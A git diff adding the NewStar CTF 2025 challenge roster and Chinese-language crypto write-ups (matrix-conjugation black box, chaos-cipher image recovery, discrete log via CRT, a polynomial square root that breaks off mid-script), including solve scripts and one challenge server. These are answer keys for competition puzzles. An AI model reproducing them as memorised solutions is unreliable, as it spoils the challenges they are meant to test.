"author": "s1eepy", + "inspectors": ["sysNow", "daimi", "L1nk"] + }, + { + "name": "overflow", + "category": "Pwn", + "author": "Sally", + "inspectors": ["sysNow", "Findkey", "s1eepy"] + }, + { + "name": "input_function", + "category": "Pwn", + "author": "sysNow", + "inspectors": ["Findkey", "L1nk", "Sally"] + }, + { + "name": "X0r", + "category": "Reverse", + "author": "Eleven.", + "inspectors": ["Sh4mar3", "KAMIYA"] + }, + { + "name": "EzMyDroid", + "category": "Reverse", + "author": "PangBai", + "inspectors": ["KAMIYA"] + }, + { + "name": "Puzzle", + "category": "Reverse", + "author": "Eleven.", + "inspectors": ["KAMIYA"] + }, + { + "name": "plzdebugme", + "category": "Reverse", + "author": "Samsara", + "inspectors": ["AstralPrisma", "KAMIYA", "Sh4mar3"] + }, + { + "name": "Strange Base", + "category": "Reverse", + "author": "JSnow", + "inspectors": ["KAMIYA"] + }, + { + "name": "别笑,你也过不了第二关", + "category": "Web", + "author": "rea1ity", + "inspectors": ["xNftrOne", "wsh_", "归茛"] + }, + { + "name": "宇宙的中心是 PHP", + "category": "Web", + "author": "xNftrOne", + "inspectors": ["Anchovy", "KAMIYA", "Cnily03"] + }, + { + "name": "multi-headach3", + "category": "Web", + "author": "D0ubleD", + "inspectors": ["Anchovy", "KAMIYA", "Cnily03"] + }, + { + "name": "strange_login", + "category": "Web", + "author": "D0ubleD", + "inspectors": ["KAMIYA", "Qu43ter", "L4ne"] + }, + { + "name": "黑客小 W 的故事(1)", + "category": "Web", + "author": "KAMIYA", + "inspectors": ["Anchovy", "Qu43ter", "wsh_"] + }, + { + "name": "我真得控制你了", + "category": "Web", + "author": "yunmeng", + "inspectors": ["KAMIYA", "wsh_", "xNftrOne"] + }, + { + "name": "初识 RSA", + "category": "Crypto", + "author": "Hanson", + "inspectors": ["Cathylin"] + }, + { + "name": "随机数之旅 1", + "category": "Crypto", + "author": "Cathylin", + "inspectors": ["L1nk", "Hanson"] + }, + { + "name": "SageMath 使用指南", + "category": "Crypto", + "author": "Cathylin", + "inspectors": ["L1nk", "Hanson"] + }, + { + "name": "唯一表示", + "category": "Crypto", + "author": "Cathylin", + "inspectors": ["willyz", "Hanson"] + }, + { + "name": "小跳蛙", + "category": "Crypto", + "author": "Cathylin", + "inspectors": ["L1nk", "Hanson", "KAMIYA"] + }, + { + "name": "Sign in", + "category": "Misc", + "author": "willyz", + "inspectors": [] + }, + { + "name": "我不要革命失败", + "category": "Misc", + "author": "kndye", + "inspectors": ["xNftrOne", "Mrsh", "KAMIYA"] + }, + { + "name": "Misc 城邦:压缩术", + "category": "Misc", + "author": "willyz", + "inspectors": ["xNftrOne", "Mrsh"] + }, + { + "name": "OSINT:天空 belong", + "category": "Misc", + "author": "willyz", + "inspectors": ["KAMIYA", "Mrsh"] + }, + { + "name": "EZ_fence", + "category": "Misc", + "author": "Muzhi", + "inspectors": ["Daybreak", "kndye", "Mrsh"] + }, + { + "name": "前有文字,所以搜索很有用", + "category": "Misc", + "author": "miko", + "inspectors": ["xNftrOne", "Mrsh", "KAMIYA"] + } + ], + "week2": [ + { + "name": "刻在栈里的秘密", + "category": "Pwn", + "author": "L1nk", + "inspectors": ["sysNow", "Sally", "KAMIYA"] + }, + { + "name": "no shell", + "category": "Pwn", + "author": "Findkey", + "inspectors": ["sysNow", "s1eepy", "Sally"] + }, + { + "name": "syscall", + "category": "Pwn", + "author": "s1eepy", + "inspectors": ["sysNow", "L1nk", "Sally"] + }, + { + "name": "input_small_function", + "category": "Pwn", + "author": "sysNow", + "inspectors": ["L1nk", "s1eepy", "Sally"] + }, + { + "name": "calc_beta", + "category": "Pwn", + "author": "daimi", + "inspectors": ["s1eepy", "KAMIYA"] + }, + { + "name": "尤皮·埃克斯历险记(1)", + "category": "Reverse", + "author": "AstralPrisma", + "inspectors": ["JSnow", "KAMIYA"] + }, + { + "name": "采一朵花,送给艾达(1)", + "category": "Reverse", + "author": "AstralPrisma", + "inspectors": ["Azusaq", "KAMIYA"] + }, + { + "name": "Forgotten_Code", + "category": "Reverse", + "author": "Azusaq", + "inspectors": ["KAMIYA"] + }, + { + "name": "Look at me carefully", + "category": "Reverse", + "author": "JSnow", + "inspectors": ["KAMIYA"] + }, + { + "name": "OhNativeEnc", + "category": "Reverse", + "author": "PangBai", + "inspectors": ["Azusaq", "KAMIYA"] + }, + { + "name": "真的是签到诶", + "category": "Web", + "author": "KAMIYA", + "inspectors": ["xNftrOne"] + }, + { + "name": "搞点哦润吉吃吃🍊", + "category": "Web", + "author": "Qu43ter", + "inspectors": ["KAMIYA", "Anchovy", "wsh_"] + }, + { + "name": "DD 加速器", + "category": "Web", + "author": "D0ubleD", + "inspectors": ["Anchovy", "KAMIYA", "wsh_"] + }, + { + "name": "白帽小 K 的故事(1)", + "category": "Web", + "author": "KAMIYA", + "inspectors": ["wsh_", "xNftrOne", "ENOCH"] + }, + { + "name": "小 E 的管理系统", + "category": "Web", + "author": "ENOCH", + "inspectors": ["KAMIYA", "wsh_"] + }, + { + "name": "DLP_1", + "category": "Crypto", + "author": "Hanson", + "inspectors": ["Cathylin"] + }, + { + "name": "FHE: 0&1", + "category": "Crypto", + "author": "Cathylin", + "inspectors": ["Hanson"] + }, + { + "name": "群论小测试", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "置换", + "category": "Crypto", + "author": "Cathylin", + "inspectors": ["Hanson"] + }, + { + "name": "RSA_revenge", + "category": "Crypto", + "author": "Hanson", + "inspectors": ["Cathylin"] + }, + { + "name": "美妙的音乐", + "category": "Misc", + "author": "AstralPrisma", + "inspectors": ["Mrsh", "miko", "willyz"] + }, + { + "name": "日志分析:不敬者的闯入", + "category": "Misc", + "author": "willyz", + "inspectors": ["miko"] + }, + { + "name": "OSINT:威胁情报", + "category": "Misc", + "author": "willyz", + "inspectors": ["Mrsh", "miko"] + }, + { + "name": "星期四的狂想", + "category": "Misc", + "author": "KAMIYA", + "inspectors": ["miko", "Mrsh"] + }, + { + "name": "Misc 城邦:NewKeyboard", + "category": "Misc", + "author": "willyz", + "inspectors": ["miko", "Mrsh"] + } + ], + "week3": [ + { + "name": "fmt&canary", + "category": "Pwn", + "author": "L1nk", + "inspectors": ["s1eepy", "Zeriah"] + }, + { + "name": "sandbox_plus", + "category": "Pwn", + "author": "sysNow", + "inspectors": ["L1nk", "s1eepy", "Zeriah"] + }, + { + "name": "小的明?题问", + "category": "Pwn", + "author": "daimi", + "inspectors": [] + }, + { + "name": "calc_meow", + "category": "Pwn", + "author": "daimi", + "inspectors": [] + }, + { + "name": "only_read", + "category": "Pwn", + "author": "Sally", + "inspectors": ["Findkey"] + }, + { + "name": "pyz3", + "category": "Reverse", + "author": "Azusaq", + "inspectors": ["AstralPrisma"] + }, + { + "name": "采一朵花,送给艾达(2)", + "category": "Reverse", + "author": "AstralPrisma", + "inspectors": ["JSnow", "Azusaq"] + }, + { + "name": "谁改了我的密钥啊", + "category": "Reverse", + "author": "PangBai", + "inspectors": ["Azusaq"] + }, + { + "name": "尤皮·埃克斯历险记(2)", + "category": "Reverse", + "author": "AstralPrisma", + "inspectors": ["Azusaq"] + }, + { + "name": "Dancing Functions", + "category": "Reverse", + "author": "AstralPrisma", + "inspectors": [] + }, + { + "name": "小 E 的秘密计划", + "category": "Web", + "author": "ENOCH", + "inspectors": ["xNftrOne", "wsh_", "归茛"] + }, + { + "name": "ez-chain", + "category": "Web", + "author": "D0ubleD", + "inspectors": ["xNftrOne", "归茛", "KAMIYA"] + }, + { + "name": "MyGO!!!", + "category": "Web", + "author": "rea1ity", + "inspectors": ["wsh_", "KAMIYA", "xNftrOne"] + }, + { + "name": "白帽小 K 的故事(2)", + "category": "Web", + "author": "KAMIYA", + "inspectors": ["ENOCH", "wsh_", "D0ubleD"] + }, + { + "name": "mirror_gate", + "category": "Web", + "author": "Icesugar", + "inspectors": ["KAMIYA", "xNftrOne", "wsh_"] + }, + { + "name": "who'ssti", + "category": "Web", + "author": "KAMIYA", + "inspectors": ["wsh_", "Icesugar", "D0ubleD"] + }, + { + "name": "CBC 之舞", + "category": "Crypto", + "author": "gloriablack", + "inspectors": ["Hanson"] + }, + { + "name": "被泄露的素数", + "category": "Crypto", + "author": "gloriablack", + "inspectors": ["Hanson"] + }, + { + "name": "欧皇的生日", + "category": "Crypto", + "author": "Cathylin", + "inspectors": ["gloriablack", "Hanson", "KAMIYA"] + }, + { + "name": "随机数之旅 3", + "category": "Crypto", + "author": "Cathylin", + "inspectors": ["Hanson"] + }, + { + "name": "GCL", + "category": "Crypto", + "author": "Cathylin", + "inspectors": ["Hanson"] + }, + { + "name": "流量分析:S7 的秘密", + "category": "Misc", + "author": "willyz", + "inspectors": [] + }, + { + "name": "日志分析:盲辨海豚", + "category": "Misc", + "author": "willyz", + "inspectors": ["miko", "Mrsh"] + }, + { + "name": "内存取证:Windows 篇", + "category": "Misc", + "author": "miko", + "inspectors": ["willyz"] + }, + { + "name": "区块链:以太坊的约定", + "category": "Misc", + "author": "willyz", + "inspectors": [] + }, + { + "name": "jail-evil eval", + "category": "Misc", + "author": "KAMIYA", + "inspectors": ["yuro"] + } + ], + "week4": [ + { + "name": "fmt&got", + "category": "Pwn", + "author": "L1nk", + "inspectors": ["daimi", "Findkey", "Zeriah"] + }, + { + "name": "海市蜃楼", + "category": "Pwn", + "author": "daimi", + "inspectors": ["Findkey", "sysNow", "Sally"] + }, + { + "name": "memory", + "category": "Pwn", + "author": "sysNow", + "inspectors": ["Zeriah", "Findkey", "L1nk"] + }, + { + "name": "calc_queen", + "category": "Pwn", + "author": "daimi", + "inspectors": ["Findkey"] + }, + { + "name": "content", + "category": "Pwn", + "author": "ishmael", + "inspectors": ["daimi"] + }, + { + "name": "NOT_TUI", + "category": "Reverse", + "author": "Azusaq", + "inspectors": ["AstralPrisma", "JSnow"] + }, + { + "name": "PleaseHookMe", + "category": "Reverse", + "author": "PangBai", + "inspectors": [] + }, + { + "name": "尤皮·埃克斯历险记(3)", + "category": "Reverse", + "author": "AstralPrisma", + "inspectors": ["JSnow"] + }, + { + "name": "Dancing Keys", + "category": "Reverse", + "author": "AstralPrisma", + "inspectors": ["Azusaq", "JSnow"] + }, + { + "name": "ezrust", + "category": "Reverse", + "author": "Azusaq", + "inspectors": ["JSnow"] + }, + { + "name": "SSTI 在哪里?", + "category": "Web", + "author": "wsh_", + "inspectors": ["JohnSmith", "ENOCH", "L4ne"] + }, + { + "name": "武功秘籍", + "category": "Web", + "author": "yuhua", + "inspectors": ["KAMIYA", "D0ubleD", "L4ne"] + }, + { + "name": "小 E 的留言板", + "category": "Web", + "author": "ENOCH", + "inspectors": ["KAMIYA", "wsh_", "D0ubleD"] + }, + { + "name": "小羊走迷宫", + "category": "Web", + "author": "xNftrOne", + "inspectors": ["wsh_", "KAMIYA", "D0ubleD"] + }, + { + "name": "sqlupload", + "category": "Web", + "author": "KAMIYA", + "inspectors": ["D0ubleD", "wsh_"] + }, + { + "name": "独一无二", + "category": "Crypto", + "author": "Cathylin", + "inspectors": ["KAMIYA", "Hanson"] + }, + { + "name": "随机数之旅 4", + "category": "Crypto", + "author": "Cathylin", + "inspectors": ["KAMIYA", "Hanson", "Icesugar"] + }, + { + "name": "共轭迷宫", + "category": "Crypto", + "author": "gloriablack", + "inspectors": ["KAMIYA", "Hanson"] + }, + { + "name": "三重密钥锁", + "category": "Crypto", + "author": "gloriablack", + "inspectors": [] + }, + { + "name": "天虫的秘密", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "流量分析:听声辩位", + "category": "Misc", + "author": "willyz", + "inspectors": ["miko", "Mrsh"] + }, + { + "name": "区块链:智能合约", + "category": "Misc", + "author": "willyz", + "inspectors": ["KAMIYA", "miko", "Mrsh"] + }, + { + "name": "jail-Neuro jail", + "category": "Misc", + "author": "KAMIYA", + "inspectors": ["miko", "willyz", "Mrsh"] + }, + { + "name": "混乱的网站", + "category": "Misc", + "author": "willyz", + "inspectors": ["KAMIYA", "miko", "Mrsh"] + }, + { + "name": "应急响应:初识", + "category": "Misc", + "author": "willyz", + "inspectors": ["miko"] + } + ], + "week5": [ + { + "name": "复读机堂堂归来!复读机堂堂归来!", + "category": "Pwn", + "author": "L1nk", + "inspectors": ["daimi", "Zeriah"] + }, + { + "name": "note", + "category": "Pwn", + "author": "sysNow", + "inspectors": ["Sally", "L1nk", "Zeriah"] + }, + { + "name": "stdout", + "category": "Pwn", + "author": "L1nk", + "inspectors": [] + }, + { + "name": "go?", + "category": "Pwn", + "author": "ishmael", + "inspectors": [] + }, + { + "name": "Pwn the world", + "category": "Pwn", + "author": "daimi", + "inspectors": [] + }, + { + "name": "魔法少女的秘密", + "category": "Reverse", + "author": "PangBai", + "inspectors": [] + }, + { + "name": "天才的「认证」", + "category": "Reverse", + "author": "yuro", + "inspectors": ["AstralPrisma"] + }, + { + "name": "AnEasySystem", + "category": "Reverse", + "author": "AstralPrisma", + "inspectors": ["AstralPrisma", "Azusaq"] + }, + { + "name": "Jvav Master", + "category": "Reverse", + "author": "AstralPrisma", + "inspectors": [] + }, + { + "name": "河图洛书", + "category": "Reverse", + "author": "AstralPrisma", + "inspectors": ["Azusaq"] + }, + { + "name": "被玩坏的 AI", + "category": "Web", + "author": "归茛", + "inspectors": ["xNftrOne", "D0ubleD", "wsh_"] + }, + { + "name": "废弃的网站", + "category": "Web", + "author": "sanjio", + "inspectors": ["D0ubleD", "wsh_"] + }, + { + "name": "小 W 和小 K 的故事(最终章)", + "category": "Web", + "author": "KAMIYA", + "inspectors": ["D0ubleD", "wsh_"] + }, + { + "name": "眼熟的计算器", + "category": "Web", + "author": "KAMIYA", + "inspectors": ["D0ubleD", "wsh_"] + }, + { + "name": "Binary Blog", + "category": "Web", + "author": "归茛", + "inspectors": ["D0ubleD"] + }, + { + "name": "不给你看喵", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "BLS 多重签名:零的裂变", + "category": "Crypto", + "author": "gloriablack", + "inspectors": [] + }, + { + "name": "Poly", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "Smile 盒", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "区块链:INTbug", + "category": "Misc", + "author": "willyz", + "inspectors": ["miko"] + }, + { + "name": "应急响应:把你 mikumiku 掉(1)", + "category": "Misc", + "author": "willyz", + "inspectors": [] + }, + { + "name": "应急响应:把你 mikumiku 掉(2)", + "category": "Misc", + "author": "willyz", + "inspectors": [] + }, + { + "name": "应急响应:把你 mikumiku 掉(3)", + "category": "Misc", + "author": "willyz", + "inspectors": [] + }, + { + "name": "AI HACKER", + "category": "Misc", + "author": "Mrsh", + "inspectors": [] + }, + { + "name": "TIME HACKER", + "category": "Misc", + "author": "Mrsh", + "inspectors": ["miko"] + } + ], + "extras": [ + { + "name": "llama-pwn", + "category": "Pwn", + "author": "Th3S", + "inspectors": [] + }, + { + "name": "Not Symmetric", + "category": "Reverse", + "author": "AstralPrisma", + "inspectors": [] + }, + { + "name": "who'ssti revenge", + "category": "Web", + "author": "KAMIYA", + "inspectors": [] + }, + { + "name": "黑盒 1", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "混沌密码学入门", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "简约但不简单", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "随机数之旅 1.3", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "随机数之旅 1.9", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "随机数之旅 2", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "随机数之旅 3.6", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "随机数之旅 3.9", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "运气与实力", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "置换 DLP", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "DLP", + "category": "Crypto", + "author": "Hanson", + "inspectors": [] + }, + { + "name": "final_R", + "category": "Crypto", + "author": "Cathylin", + "inspectors": [] + }, + { + "name": "Weil 的噪声与秩序", + "category": "Crypto", + "author": "gloriablack", + "inspectors": [] + }, + { + "name": "不是所有牛奶都叫___", + "category": "Misc", + "author": "miko", + "inspectors": [] + } + ] +} diff --git a/docs/wp/2025/extras/crypto/blackbox-1.md b/docs/wp/2025/extras/crypto/blackbox-1.md new file mode 100644 index 0000000..85e0bda --- /dev/null +++ b/docs/wp/2025/extras/crypto/blackbox-1.md @@ -0,0 +1,329 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 黑盒 1 + +首先先猜黑盒结构是 $f(X)=SXS^{-1},X\in \mathbb{GL}(n,q)$,然后你就可以通过输入初等矩阵来求解了。 + +```python +n= 3 +q= +F = GF(q) +i = 0 +a = F(1) # a=1 + +A = [0,0,0] +A[0]=[[2,0,0],[0,1,0],[0,0,1]] +A[1]=[[1,0,0],[1,1,0],[0,0,1]] +A[2]=[[1,0,0],[0,1,0],[1,0,1]] +A=[matrix(A[i]) for i in range(n)] +B = [0,0,0] +B[0]= +B[1]= +B[2]= +B=[matrix(Zmod(q),B[i]) for i in range(n)] + +M0 = B[0] - matrix.identity(F, n) +k = None +for col in range(n): + if not M0.column(col).is_zero(): + k = col + break +if k is None: + raise ValueError("无法找到非零列,请尝试不同的 i 或 a") + +# 恢复 S 的列 +S_columns = [] +for j in range(n): + M_j = B[j] - matrix.identity(F, n) + u_j = M_j.column(k) # 取第 k 列 + s_j = u_j / a # 由于 a=1,可省略除法,但为了通用性保留 + S_columns.append(s_j) + +# 将列组合成矩阵 S_recovered +S_recovered = matrix(F, n, n) +for j in range(n): + S_recovered.set_column(j, S_columns[j]) +``` + +如何判断黑盒结构是自同构?本题允许无限次输入 $X$ 并获取 $f(X)$,因此可以通过多次查询观察结构,再进行猜测与验证。 + +题目脚本: + +```python + +import secrets +import random +from secret import FLAG + +# ---------- minimal finite-field matrix utilities ---------- + +def egcd(a,b): + if b==0: + return (a,1,0) + g,x1,y1 = egcd(b, a % b) + return (g, y1, x1 - (a//b) * y1) + +def inv_mod(a, p): + a %= p + if a==0: + raise ZeroDivisionError + g,x,y = egcd(a,p) + if g!=1: + raise ZeroDivisionError + return x % p + +class Matrix: + def __init__(self, rows, p): + self.p = p + self.rows = [[x % p for x in row] for row in rows] + self.n = len(rows) + + @classmethod + def zero(cls, n, p): + return cls([[0]*n for _ in range(n)], p) + + @classmethod + def identity(cls, n, p): + M = cls.zero(n, p) + for i in range(n): + M.rows[i][i] = 1 + return M + + @classmethod + def random_invertible(cls, n, p): + while True: + rows = [[secrets.randbelow(p) for _ in range(n)] for _ in range(n)] + M = cls(rows, p) + if M.det() % p != 0: + return M + + def copy(self): + return Matrix([row[:] for row in self.rows], self.p) + + def __mul__(self, other): + if isinstance(other, Matrix): + n=self.n; p=self.p + R = [[0]*n for _ in range(n)] + for i in range(n): + for k in range(n): + aik = self.rows[i][k] + if aik==0: continue + rowk = other.rows[k] + ri = R[i] + for j in range(n): + ri[j] = (ri[j] + aik * rowk[j]) % p + return Matrix(R, p) + else: + return Matrix([[ (a*other) % self.p for a in row] for row in self.rows], self.p) + + def scalar_mul(self, c): + return Matrix([[ (c*e) % self.p for e in row] for row in self.rows], self.p) + + def det(self): + n=self.n; p=self.p + A = [row[:] for row in self.rows] + det = 1 + for i in range(n): + pivot = i + while pivot < n and A[pivot][i] == 0: + pivot += 1 + if pivot == n: + return 0 + if pivot != i: + A[i], A[pivot] = A[pivot], A[i] + det = (-det) % p + inv = inv_mod(A[i][i], p) + det = (det * A[i][i]) % p + for r in range(i+1, n): + if A[r][i] == 0: continue + factor = (A[r][i] * inv) % p + for c in range(i, n): + A[r][c] = (A[r][c] - factor * A[i][c]) % p + return det % p + + def inverse(self): + n=self.n; p=self.p + A = [row[:] for row in self.rows] + I = [[1 if i==j else 0 for j in range(n)] for i in range(n)] + for i in range(n): + pivot = i + while pivot < n and A[pivot][i] == 0: + pivot += 1 + if pivot == n: + raise ZeroDivisionError('singular') + if pivot != i: + A[i], A[pivot] = A[pivot], A[i] + I[i], I[pivot] = I[pivot], I[i] + inv = inv_mod(A[i][i], p) + for c in range(n): + A[i][c] = (A[i][c] * inv) % p + I[i][c] = (I[i][c] * inv) % p + for r in range(n): + if r==i: continue + factor = A[r][i] + if factor==0: continue + for c in range(n): + A[r][c] = (A[r][c] - factor * A[i][c]) % p + I[r][c] = (I[r][c] - factor * I[i][c]) % p + return Matrix(I, p) + + def eq(self, other): + return all((a-b) % self.p == 0 for ra,rb in zip(self.rows, other.rows) for a,b in zip(ra,rb)) + + def to_string(self): + return ';'.join(','.join(str(x) for x in row) for row in self.rows) + + @classmethod + def from_string(cls, s, p): + try: + rows = [[int(x) % p for x in row.split(',')] for row in s.strip().split(';')] + if len(rows) == 0: raise ValueError + n = len(rows) + if any(len(r)!=n for r in rows): raise ValueError + return cls(rows, p) + except Exception: + raise ValueError('bad matrix format') + + def first_nonzero_entry(self): + for i in range(self.n): + for j in range(self.n): + if self.rows[i][j] % self.p != 0: + return (i,j,self.rows[i][j] % self.p) + return None + +# ---------- challenge core --------------------------------- + +class ConjugationChallenge: + def __init__(self,FLAG, n=4, q=97, max_queries=200): + self.n = n; self.q = q + self.FLAG = FLAG + self.max_queries = max_queries + self.queries = 0 + self.S = Matrix.random_invertible(n, q) + self.S_inv = self.S.inverse() + self.X_secret = Matrix.random_invertible(n, q) + self.Y_target = self.S * self.X_secret * self.S_inv + self.stage1_passed = False + + def f(self, X: Matrix) -> Matrix: + return self.S * X * self.S_inv + + def equal_up_to_scalar(self, A: Matrix, B: Matrix) -> bool: + p = self.q + entry = B.first_nonzero_entry() + if entry is None: + return A.first_nonzero_entry() is None + i,j,b = entry + a = A.rows[i][j] + if a % p == 0: + return False + try: + c = (a * inv_mod(b, p)) % p + except ZeroDivisionError: + return False + for r in range(B.n): + for ccol in range(B.n): + if A.rows[r][ccol] % p != (c * B.rows[r][ccol]) % p: + return False + return True + +# ----------------- stdin/stdout loop ------------------------ + +def print_help(): + print('Whats:') + print(' A black box (function). After inputting a matrix, it outputs a matrix.') + print(' All matrices are in GL(n,q).') + print('Commands:') + print(' QUERY -- get f(matrix)') + print(' STAGE1 -- get Y = f(X_secret); then guess X_secret') + print(' GUESS -- submit candidate X for stage1') + print(''' STAGE2 -- After you passed STAGE1 and figured out the structure of the black box, + you need to submit a very important matrix S. f(X) is related to S. + If you pass STAGE2, I will give you FLAG''') + print(' SOLVE -- submit candidate S (accepted up to nonzero scalar)') + print(' HELP -- this message') + print(' QUIT -- exit') + +def main(): + n_=random.randint(3,4) + q_list=[97,18438074019027044383, 14812452124560918479, 17698650832589511139, 13688439759297834127, 12667571192190072239, 16736506655081653159, 13315982169682185221, 11120973245938580473, 17256530423800303043, 14121827379471213803] #没想到吧,q 是有限的。 + q_=random.choice(q_list) + maxq_list=[4,10,100] + maxq=random.choice(maxq_list) + chal = ConjugationChallenge(n=n_, q=q_, FLAG=FLAG, max_queries=maxq) + print('Matrix blackbox (stdin/stdout). Type HELP.') + try: + while True: + line = input('> ').strip() + if not line: + continue + parts = line.split(' ',1) + cmd = parts[0].upper(); arg = parts[1] if len(parts)>1 else '' + if cmd == 'HELP': + print_help() + print('Parameters:') + print(f' n -- {chal.n}') + print(f' q -- {chal.q}') + print(f' max_queries -- {chal.max_queries}') + print('Matrix Input Demonstration:') + print(' 3x3 identity matrix -- 1,0,0;0,1,0;0,0,1') + elif cmd == 'QUIT': + print('bye') + break + elif cmd == 'QUERY': + if chal.queries >= chal.max_queries: + print('ERROR: query limit reached') + continue + try: + X = Matrix.from_string(arg, chal.q) + except ValueError: + print('ERROR: bad matrix format') + continue + Y = chal.f(X) + chal.queries += 1 + print(Y.to_string()) + elif cmd == 'STAGE1': + print('STAGE1: Here is Y = f(X_secret):') + print(chal.Y_target.to_string()) + print('Now guess X_secret. You need send GUESS ') + elif cmd == 'GUESS': + try: + Xg = Matrix.from_string(arg, chal.q) + except ValueError: + print('ERROR: bad matrix format') + continue + if chal.f(Xg).eq(chal.Y_target): + print('Correct: stage1 passed. You can go to STAGE2.') + chal.stage1_passed = True + else: + print('Incorrect preimage.') + elif cmd == 'STAGE2': + if not chal.stage1_passed: + print('You must pass stage1 first.') + else: + print('Stage2: submit candidate using SOLVE .') + elif cmd == 'SOLVE': + if not chal.stage1_passed: + print('You must pass stage1 first.') + continue + try: + Sg = Matrix.from_string(arg, chal.q) + except ValueError: + print('ERROR: bad matrix format') + continue + if chal.equal_up_to_scalar(Sg, chal.S): + print('Correct! Here is your FLAG: ' + chal.FLAG) + break + else: + print('Incorrect S.') + else: + print('Unknown command. Type HELP.') + except EOFError: + print('EOF - exit') + +if __name__ == '__main__': + main() + +``` diff --git a/docs/wp/2025/extras/crypto/chaos-cipher-intro.md b/docs/wp/2025/extras/crypto/chaos-cipher-intro.md new file mode 100644 index 0000000..b03ead5 --- /dev/null +++ b/docs/wp/2025/extras/crypto/chaos-cipher-intro.md @@ -0,0 +1,74 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 混沌密码学入门 + +题目已经给出混沌序列和加密过程,因此按加密流程逆向恢复即可。 + +EXP: + +```python +from math import sin,pi +from PIL import Image + +def Feigenbaum_Equation(a,b,r1,r2,x1,y1,n,t): + x=[x1] + y=[y1] + for _ in range(n): + x.append(3*a*sin(pi*x[-1])+r1*y[-1]) + y.append(3*b*sin(pi*y[-1])+r2*y[-1]) + return x[-t:],y[-t:] + +img = Image.open(r"\chaos_chaos.png") +pixels = img.load() +w, h = img.size +n = w * h + +xl,_=Feigenbaum_Equation(0.9,1.01,0.1,0.2,0.22,0.43,2*n,n) + +pixel_list = [] +for x in range(w): + for y in range(h): + pixel_list.append(pixels[x, y]) + +# 下面是通过两次索引数组排序恢复像素的正确位置 + +N=[[0]*n for _ in range(2)] +N[0]=[i+1 for i in range(n)] +N[1]=xl + +N1i = sorted(enumerate(N[1]), key=lambda x: x[1]) +Ni = [index for index, value in N1i] +N_ = [] +for row in N: + new_row = [row[i] for i in Ni] + N_.append(new_row) + +xn=N_[0] + +L=[[0]*n for _ in range(2)] +L[0]=xn +L[1]=pixel_list + +L1i = sorted(enumerate(L[0]), key=lambda x: x[1]) +Li = [index for index, value in L1i] +L_ = [] +for row in L: + new_row = [row[i] for i in Li] + L_.append(new_row) + +index = 0 +for x in range(w): + for y in range(h): + pixels[x, y] = L_[1][index] + index += 1 + +img.show() +``` + +解密结果: + +> 此处原文引用了示意图,但图片文件未包含在压缩包中。 + +由于浮点精度、舍入和误差累积问题,Windows 与 Linux 生成的混沌序列在约 30 个数后会出现明显差异,因此不同平台的解密结果可能不同。 diff --git a/docs/wp/2025/extras/crypto/dlp.md b/docs/wp/2025/extras/crypto/dlp.md new file mode 100644 index 0000000..9499a00 --- /dev/null +++ b/docs/wp/2025/extras/crypto/dlp.md @@ -0,0 +1,38 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# DLP + +这是 week2DLP_1 的升级版,这里使用到了几个 sagemath 中的函数,其他基础知识在 DLP_1 和 week1 的题目中已有涉及到,解题脚本如下: + +```python +from Crypto.Util.number import long_to_bytes +N = +y = +fac = factor(N) +primes = [] +for p, e in fac: + for _ in range(e): + primes.append(Integer(p)) + +residues = [] +moduli = [] + +for idx, p in enumerate(primes, start=1): + p = Integer(p) + # 找一个原根 g + g = primitive_root(p) # Sage 内置函数 + yi = Integer(y % p) + d = discrete_log(Mod(yi, p), Mod(g, p)) + residues.append(Integer(d)) + moduli.append(Integer(p - 1)) + +# 使用中国剩余定理合并所有同余 +x_recovered = crt(residues, moduli) +print("Recovered integer x (mod product of moduli) =", x_recovered) + +# 4) 把整数转回 bytes -> str +flag_bytes = long_to_bytes(int(x_recovered)) +print(flag_bytes) +``` diff --git a/docs/wp/2025/extras/crypto/final-r.md b/docs/wp/2025/extras/crypto/final-r.md new file mode 100644 index 0000000..7e6a357 --- /dev/null +++ b/docs/wp/2025/extras/crypto/final-r.md @@ -0,0 +1,61 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# final_R + +神秘一行 python + +解释:FLAG 转为$\mathbb{GF}(2^7)$上的($59$维)向量(通过对每个字符使用 ord(),值 $x$ 代表 $a^x$ ,$a$ 是生成元). 然后该向量对自己做循环卷积。结果向量(的值$a^x\in \mathbb{GF}(2^7)$转为$x$,)输出为字节形式。 + +你当然可以直接解卷积。 + +商环 $\mathbb{F}[x]/(x^n-1)$ 和向量空间 $\mathrm{F}^n$ 有一一对应关系: +$r(x)=\sum_i a_ix^{i}\in \mathbb{F}[x]/(x^n-1) \rightarrow (\cdots,a_i,\cdots)\in \mathbb{F}^n$ +多项式加法对应向量加法 +多项式乘法对应向量的循环卷积。 + +所以本题其实就是求一个多项式的平方根。 +怎么求呢? + +非常简单,直接列出来观察就行。因为$\mathbb{GF}(2^7)$ 特征是 $2$ ,所以没有交叉项。直接对应系数相等求解就可以了。 + +```python +# 解题脚本。 +n = 59 +char = 2 +m = 7 + +F = GF(2**m, 'a') +a = F.gen() # 获取本原元 a + +R. = F[] +mod_poly = x**n - 1 + +def find_sqrt_in_quotient_ring(f_poly): + f_coeffs = f_poly.coefficients(sparse=False) + if len(f_coeffs) < n: + f_coeffs.extend([F(0)] * (n - len(f_coeffs))) + inv_2 = pow(2, -1, n) + + g_coeffs = [] + for k in range(n): + source_index = (2 * k) % n + a_j = f_coeffs[source_index] + if 